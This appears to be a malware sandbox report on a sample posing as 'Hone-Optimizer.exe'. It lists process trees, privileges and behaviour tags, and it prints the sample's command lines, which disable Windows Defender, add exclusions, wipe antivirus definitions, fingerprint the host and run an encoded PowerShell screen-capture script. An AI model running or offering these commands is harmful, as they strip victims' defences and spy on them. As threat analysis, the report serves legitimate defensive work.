Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2292 wrote to memory of 3632 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe
PID 2292 wrote to memory of 3632 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe
PID 3632 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 3192 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 3192 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 4932 wrote to memory of 2452 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4932 wrote to memory of 2452 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3088 wrote to memory of 5112 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3088 wrote to memory of 5112 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2148 wrote to memory of 1772 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2148 wrote to memory of 1772 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1780 wrote to memory of 1212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1780 wrote to memory of 1212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3192 wrote to memory of 2008 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3192 wrote to memory of 2008 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4572 wrote to memory of 3276 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 4572 wrote to memory of 3276 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 3276 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 3276 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 1872 wrote to memory of 1184 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 1872 wrote to memory of 1184 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 1872 wrote to memory of 1744 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1872 wrote to memory of 1744 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3632 wrote to memory of 4244 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 4244 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 1872 wrote to memory of 3964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1872 wrote to memory of 3964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1872 wrote to memory of 4808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1872 wrote to memory of 4808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4244 wrote to memory of 1508 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4244 wrote to memory of 1508 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1872 wrote to memory of 2532 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Conhost.exe
PID 1872 wrote to memory of 2532 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Conhost.exe
PID 3632 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 1872 wrote to memory of 4820 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1872 wrote to memory of 4820 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1004 wrote to memory of 4248 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1004 wrote to memory of 4248 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3632 wrote to memory of 4412 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 4412 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 4412 wrote to memory of 4476 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4412 wrote to memory of 4476 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3632 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 4932 wrote to memory of 4240 N/A C:\Windows\system32\cmd.exe C:\Program Files\Windows Defender\MpCmdRun.exe
PID 4932 wrote to memory of 4240 N/A C:\Windows\system32\cmd.exe C:\Program Files\Windows Defender\MpCmdRun.exe
PID 1236 wrote to memory of 4692 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1236 wrote to memory of 4692 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3632 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3776 wrote to memory of 216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3776 wrote to memory of 216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

cURL User-Agent

Description Indicator Process Target
HTTP User-Agent header curl/8.7.1 N/A N/A
HTTP User-Agent header curl/8.7.1 N/A N/A
HTTP User-Agent header curl/8.7.1 N/A N/A
HTTP User-Agent header curl/8.7.1 N/A N/A
HTTP User-Agent header curl/8.7.1 N/A N/A
HTTP User-Agent header curl/8.7.1 N/A N/A
HTTP User-Agent header curl/8.7.1 N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe

"C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"

C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe

"C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "start bound.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\bound.exe

bound.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6E5A.tmp\6E5B.tmp\6E5C.bat C:\Users\Admin\AppData\Local\Temp\bound.exe"

C:\Windows\system32\mode.com

Mode 130,45

C:\Windows\system32\reg.exe

reg add HKLM /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\CrashControl" /v "DisplayParameters" /t REG_DWORD /d "1" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

C:\Windows\system32\reg.exe

reg add HKCU\CONSOLE /v VirtualTerminalLevel /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "Disclaimer"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAI